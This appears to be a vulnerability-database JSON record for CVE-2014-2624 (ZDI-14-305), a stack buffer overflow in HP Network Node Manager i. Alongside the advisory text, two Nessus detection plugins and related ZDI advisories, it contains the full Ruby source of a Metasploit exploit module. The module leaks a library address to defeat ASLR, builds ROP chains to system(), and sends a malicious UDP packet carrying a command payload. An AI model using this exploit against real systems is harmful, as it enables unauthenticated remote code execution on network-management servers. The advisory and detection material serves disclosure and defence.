ID ZDI-14-305 Type zdi Reporter d(-_-)b
HP Zero Day Initiative Modified 2014-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.
The specific flaw exists within ovopi.dll which listens by default on UDP port 696. When parsing option -S with a buffer followed by a semi-colon, the process blindly copies user supplied data into a fixed-length buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.
{"hash": "f50a8729f97c0e938c663756e5d15fcec923a77b51138a71d9c27348cee89452", "edition": 2, "title": "Hewlett-Packard Network Node Manager ovopi.dll Stack Based Buffer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on UDP port 696. When parsing option -S with a buffer followed by a semi-colon, the process blindly copies user supplied data into a fixed-length buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "viewCount": 1, "objectVersion": "1.2", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "e170338bfa61f5809bbe310afd332a22", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07c35235a33f99eeab6ac2ab688bcd46", "key": "description"}, {"hash": "039a08c8dc4d2e45d0df43f788048d02", "key": "href"}, {"hash": "0e8f4f13c11de32dac689cf2a0ab4284", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "420581db8ae131561dd6d88234fd2e42", "key": "published"}, {"hash": "7b280d2608093d67f1743703a667c371", "key": "references"}, {"hash": "6dc72c063460d5fb65cff59519f40e77", "key": "reporter"}, {"hash": "b44d1cbc3ea9c0cd5bc1e3f1a1bcc84f", "key": "title"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}], "cvelist": ["CVE-2014-2624"], "bulletinFamily": "info", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-305", "history": [{"bulletin": {"hash": "776cef952772b6734bb3a44a8154274ffba496f37d5a59159a0eca65e2634285", "id": "ZDI-14-305", "title": "Hewlett-Packard Network Node Manager ovopi.dll Stack Based Buffer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on UDP port 696. When parsing option -S with a buffer followed by a semi-colon, the process blindly copies user supplied data into a fixed-length buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "viewCount": 0, "objectVersion": "1.2", "hashmap": [{"hash": "6dc72c063460d5fb65cff59519f40e77", "key": "reporter"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "7b280d2608093d67f1743703a667c371", "key": "references"}, {"hash": "e170338bfa61f5809bbe310afd332a22", "key": "cvelist"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "039a08c8dc4d2e45d0df43f788048d02", "key": "href"}, {"hash": "420581db8ae131561dd6d88234fd2e42", "key": "published"}, {"hash": "07c35235a33f99eeab6ac2ab688bcd46", "key": "description"}, {"hash": "b44d1cbc3ea9c0cd5bc1e3f1a1bcc84f", "key": "title"}, {"hash": "9a10e9ed12ba0880a3e4c132dbded84d", "key": "modified"}], "cvelist": ["CVE-2014-2624"], "bulletinFamily": "info", "published": "2014-09-16T00:00:00", "references": ["https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04378450"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "reporter": "d(-_-)b\n\n HP Zero Day Initiative", "lastseen": "2016-09-04T11:33:48", "history": [], "modified": "2014-09-04T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-305", "type": "zdi"}, "lastseen": "2016-09-04T11:33:48", "edition": 1, "differentElements": ["modified"]}], "id": "ZDI-14-305", "reporter": "d(-_-)b\n\n HP Zero Day Initiative", "published": "2014-09-16T00:00:00", "references": ["https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04378450"], "lastseen": "2016-11-09T00:18:00", "modified": "2014-11-09T00:00:00", "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2624"]}, {"type": "nessus", "idList": ["HP_NNMI_HPSBMU03075.NASL", "HP_NNMI_HPSBMU03075-RHEL.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128478"]}, {"type": "zdi", "idList": ["ZDI-14-340", "ZDI-14-335", "ZDI-14-337", "ZDI-14-336", "ZDI-14-341", "ZDI-14-339", "ZDI-14-338", "ZDI-14-342", "ZDI-14-343"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13965", "SECURITYVULNS:DOC:31082"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/HP_NNMI_PMD_BOF"]}, {"type": "zdt", "idList": ["1337DAY-ID-22714"]}, {"type": "exploitdb", "idList": ["EDB-ID:34866"]}], "modified": "2016-11-09T00:18:00"}, "vulnersScore": 9.3}, "type": "zdi"}
{"cve": [{"lastseen": "2017-08-29T10:48:13", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x, 9.1x, and 9.2x allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2264.", "modified": "2017-08-28T21:34:32", "published": "2014-09-10T21:55:03", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2624", "id": "CVE-2014-2624", "title": "CVE-2014-2624", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:19:43", "bulletinFamily": "scanner", "description": "The version of HP Network Node Manager i (NNMi) installed on the\nremote host is a version that is potentially affected by a remote code\nexecution vulnerability.\n\nNote that Nessus did not check for the presence of a patch or\nworkaround for this issue.", "modified": "2018-08-10T00:00:00", "published": "2014-09-17T00:00:00", "id": "HP_NNMI_HPSBMU03075.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77730", "title": "HP Network Node Manager i Remote Code Execution (HPSBMU03075)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77730);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/10 18:07:08\");\n\n script_cve_id(\"CVE-2014-2624\");\n script_xref(name:\"HP\", value:\"HPSBMU03075\");\n script_xref(name:\"IAVA\", value:\"2014-A-0136\");\n script_xref(name:\"HP\", value:\"SSRT101519\");\n script_xref(name:\"HP\", value:\"emr_na-c04378450\");\n\n script_name(english:\"HP Network Node Manager i Remote Code Execution (HPSBMU03075)\");\n script_summary(english:\"Checks the version of HP Network Node Manager i.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is potentially affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Network Node Manager i (NNMi) installed on the\nremote host is a version that is potentially affected by a remote code\nexecution vulnerability.\n\nNote that Nessus did not check for the presence of a patch or\nworkaround for this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.openview.hp.com/selfsolve/document/KM01138724\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04378450\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5d9f9490\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 10.0 or apply the hotfix referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Network Node Manager I PMD Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/17\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:network_node_manager_i\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_nnmi_installed_windows.nasl\");\n script_require_keys(\"Settings/ParanoidReport\",\"installed_sw/HP Network Node Manager i\",\"SMB/Registry/Enumerated\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\n# Force windows only\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_name = \"HP Network Node Manager i\";\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nver = install[\"version\"];\npath = install[\"path\" ];\nport = get_kb_item(\"SMB/transport\");\nif(isnull(port)) port = 445;\n\nif (ver !~ \"^9\\.(0\\d?|1\\d|2\\d)(\\.|$)\") audit(AUDIT_INST_PATH_NOT_VULN, app_name, ver, path);\n\n# We don't check if the hotfix has been applied.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.0' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:23", "bulletinFamily": "scanner", "description": "The version of HP Network Node Manager i (NNMi) installed on the\nremote host is a version that is potentially affected by a remote code\nexecution vulnerability.\n\nNote that Nessus did not check for the presence of a patch or\nworkaround for this issue.", "modified": "2018-08-10T00:00:00", "published": "2014-12-08T00:00:00", "id": "HP_NNMI_HPSBMU03075-RHEL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79801", "title": "HP Network Node Manager i Remote Code Execution (HPSBMU03075)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79801);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2014-2624\");\n script_xref(name:\"HP\", value:\"HPSBMU03075\");\n script_xref(name:\"IAVA\", value:\"2014-A-0136\");\n script_xref(name:\"HP\", value:\"SSRT101519\");\n script_xref(name:\"HP\", value:\"emr_na-c04378450\");\n\n script_name(english:\"HP Network Node Manager i Remote Code Execution (HPSBMU03075)\");\n script_summary(english:\"Checks the version of HP Network Node Manager i.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is potentially affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Network Node Manager i (NNMi) installed on the\nremote host is a version that is potentially affected by a remote code\nexecution vulnerability.\n\nNote that Nessus did not check for the presence of a patch or\nworkaround for this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.openview.hp.com/selfsolve/document/KM01138724\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04378450\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5d9f9490\");\n script_set_attribute(attribute:\"solution\", value:\n\" Upgrade to version 10.0 or apply the hotfix referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP Network Node Manager I PMD Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:network_node_manager_i\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_nnmi_installed_nix.nasl\");\n script_require_keys(\"Settings/ParanoidReport\",\"installed_sw/HP Network Node Manager i\",\"Host/RedHat/release\",\"Host/cpu\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\n# Boiler plate RHEL\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"ppc\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\napp_name = \"HP Network Node Manager i\";\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nver = install[\"version\"];\npath = install[\"path\" ];\nport = 0;\n\nif (ver !~ \"^9\\.(0\\d?|1\\d|2\\d)(\\.|$)\") audit(AUDIT_INST_PATH_NOT_VULN, app_name, ver, path);\n\n# We don't check if the hotfix has been applied.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.0' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:44", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-30T00:00:00", "published": "2014-09-30T00:00:00", "href": "https://packetstormsecurity.com/files/128478/HP-Network-Node-Manager-I-PMD-Buffer-Overflow.html", "id": "PACKETSTORM:128478", "type": "packetstorm", "title": "HP Network Node Manager I PMD Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP Network Node Manager I PMD Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The \nvulnerability exists in the pmd service, due to the insecure usage of functions like \nstrcpy and strcat while handling stack_option packets with user controlled data. In \norder to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from \nthe stack and finally build the rop chain to avoid NX. \n}, \n'Author' => \n[ \n'd(-_-)b', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-2624'], \n['ZDI', '14-305'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'Space' => 3000, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic python perl openssl bash-tcp gawk' \n} \n}, \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Targets' => \n[ \n['Automatic', {}], \n['HP NNMi 9.10 / CentOS 5', \n{ \n# ptr to .rodata with format specifier \n#.rodata:0003BE86 aS_1 db '%s',0 \n'ov_offset' => 0x3BE86, \n:rop => :rop_hp_nnmi_9_10 \n} \n], \n['HP NNMi 9.20 / CentOS 6', \n{ \n# ptr to .rodata with format specifier \n#.rodata:0003C2D6 aS_1 db '%s',0 \n'ov_offset' => 0x3c2d8, \n:rop => :rop_hp_nnmi_9_20 \n} \n] \n], \n'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20 \n'DisclosureDate' => 'Sep 09 2014', \n'DefaultTarget' => 0 \n)) \n \nregister_options([ Opt::RPORT(7426) ], self.class) \nend \n \ndef check \nheader = [ \n0x2a5, # pmdmgr_init pkt \n0x3cc, # signature \n0xa0c, # signature \n0xca8 # signature \n].pack(\"V\") \n \ndata = \"\\x00\" * (0xfa4 - header.length) \n \npkt = header + data \n \nconnect_udp \nudp_sock.put(pkt) \nres = udp_sock.timed_read(8, 1) \nif res.blank? \n# To mitigate MacOSX udp sockets behavior \n# see https://dev.metasploit.com/redmine/issues/7480 \nudp_sock.put(pkt) \nres = udp_sock.timed_read(8) \nend \ndisconnect_udp \n \nif res.blank? \nreturn Exploit::CheckCode::Unknown \nelsif res.length == 8 && res.unpack(\"V\").first == 0x2a5 \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Unknown \nend \nend \n \ndef exploit \nconnect_udp \n# info leak with a \"proto_tbl\" packet \nprint_status(\"Sending a 'proto_tbl' request...\") \nudp_sock.put(proto_tbl_pkt) \n \nres = udp_sock.timed_read(13964, 1) \nif res.blank? \n# To mitigate MacOSX udp sockets behavior \n# see https://dev.metasploit.com/redmine/issues/7480 \nudp_sock.put(proto_tbl_pkt) \nres = udp_sock.timed_read(13964) \nend \n \nif res.blank? \nfail_with(Failure::Unknown, \"Unable to get a 'proto_tbl' response...\") \nend \n \nif target.name == 'Automatic' \nprint_status(\"Fingerprinting target...\") \nmy_target = auto_target(res) \nfail_with(Failure::NoTarget, \"Unable to autodetect target...\") if my_target.nil? \nelse \nmy_target = target \nfail_with(Failure::Unknown, \"Unable to leak libov base address...\") unless find_ov_base(my_target, res) \nend \n \nprint_good(\"Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...\") \n \n# exploit with a \"stack_option_pkt\" packet \nudp_sock.put(stack_option_pkt(my_target, @ov_base)) \n \ndisconnect_udp \nend \n \ndef rop_hp_nnmi_9_10(ov_base) \nrop = rand_text_alpha(775) \nrop << [0x808d7c1].pack(\"V\") # pop ebx ; pop ebp ; ret \nrop << [ov_base + 0x481A8].pack(\"V\") # ebx: libov .got \nrop << [0x8096540].pack(\"V\") # ptr to .data where user controlled string will be stored: \n# \"PMD Stack option specified, but stack not available (user_controlled)\" \nrop << [0x808d7c2].pack(\"V\") # pop ebp # ret \nrop << [0x08096540 + 4732].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate) \nrop << [ov_base + 0x1D692].pack(\"V\") # ptr to 'call _system' sequence: \n#.text:0001D692 lea eax, [ebp+dest] \n#.text:0001D698 push eax ; command \n#.text:0001D699 call _system \nrop \nend \n \ndef rop_hp_nnmi_9_20(ov_base) \nrop = rand_text_alpha(775) \nrop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret \nrop << [0xf7f61cd0 + ov_base + 0x1dae6].pack(\"V\") # eax: ptr to 'call _system' sequence \n#.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028) \n#.text:0001DAEC push eax ; command \n#.text:0001DAED call _system \nrop << [0x08097160].pack(\"V\") # ebx: ptr to .data where user controlled string will be stored: \n# \"PMD Stack option specified, but stack not available (user_controlled)\" \nrop << rand_text_alpha(4) # ebp: padding \nrop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax) \nrop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret \nrop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret \nrop << [0xf7f61cd0 + ov_base + 0x47f1c].pack(\"V\") # eax: libov .got base \nrop << rand_text_alpha(4) # ebx: padding \nrop << [0x8097160 + 4764].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate) \nrop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax) \nrop << [0x805a58d].pack(\"V\") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got) \nrop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret ; (eax: call to system sequence from libov) \nrop << [0x80528BC].pack(\"V\") # jmp eax \n \nrop \nend \n \ndef stack_option_pkt(t, ov_base) \nhdr = [0x2a9].pack(\"V\") # stack_option packet \ndata = \"-SA\" # stack name (invalid one 'A') \ndata << \";\" # separator \ndata << self.send(t[:rop], ov_base) # malformed stack options \ndata << payload.encoded \ndata << \";\\n\" \ndata << \"\\x00\" * (0xfa4 - data.length - hdr.length) \n \nhdr + data \nend \n \ndef proto_tbl_pkt \nhdr = [0x2aa].pack(\"V\") # proto_tbl packet \ndata = \"\\x00\" * (0xfa4 - hdr.length) \n \nhdr + data \nend \n \ndef base(address, offset) \naddress - offset \nend \n \ndef find_ov_base(t, data) \nprint_status(\"Searching #{t.name} pointers...\") \ni = 0 \ndata.unpack(\"V*\").each do |int| \nif base(int, t['ov_offset']) % 0x1000 == 0 \nprint_status(\"Pointer 0x#{int.to_s(16)} found at offset #{i * 4}\") \n@ov_base = base(int, t['ov_offset']) \nreturn true \nend \ni = i + 1 \nend \n \nfalse \nend \n \ndef auto_target(data) \ntargets.each do |t| \nnext if t.name == 'Automatic' \nif find_ov_base(t, data) \nreturn t \nend \nend \n \nnil \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128478/hp_nnmi_pmd_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on UDP port 696. When parsing opcode -S, the process blindly copies user supplied data into a fixed-length stack buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-335", "id": "ZDI-14-335", "title": "Hewlett-Packard Network Node Manager ovopi.dll Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:08", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -L, the process blindly copies user supplied data into a fixed-length buffer allowing for an arbitrary write to occur. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-340", "id": "ZDI-14-340", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -L Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:49", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -D, the process blindly copies user supplied data into a fixed-length stack buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-339", "id": "ZDI-14-339", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -D Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -T, the process blindly copies user supplied data into a fixed-length buffer allowing for an arbitrary write to occur. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-341", "id": "ZDI-14-341", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -T Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:09", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -p, the process blindly copies user supplied data into a fixed-length heap buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-336", "id": "ZDI-14-336", "title": "Hewlett-Packard Network Node Manager ovopi.dll Heap Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:50", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -L, the process blindly copies user supplied data into a fixed-length stack buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-337", "id": "ZDI-14-337", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -L Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:51", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on UDP port 696. When parsing command number 685, the process blindly copies user supplied data which can be used to overwrite a vtable or any arbitrary address. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-343", "id": "ZDI-14-343", "title": "Hewlett-Packard Network Node Manager ovopi.dll Command 685 Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:12", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -D, the process blindly copies user supplied data into a fixed-length buffer allowing for an arbitrary write to occur. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-342", "id": "ZDI-14-342", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -D Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 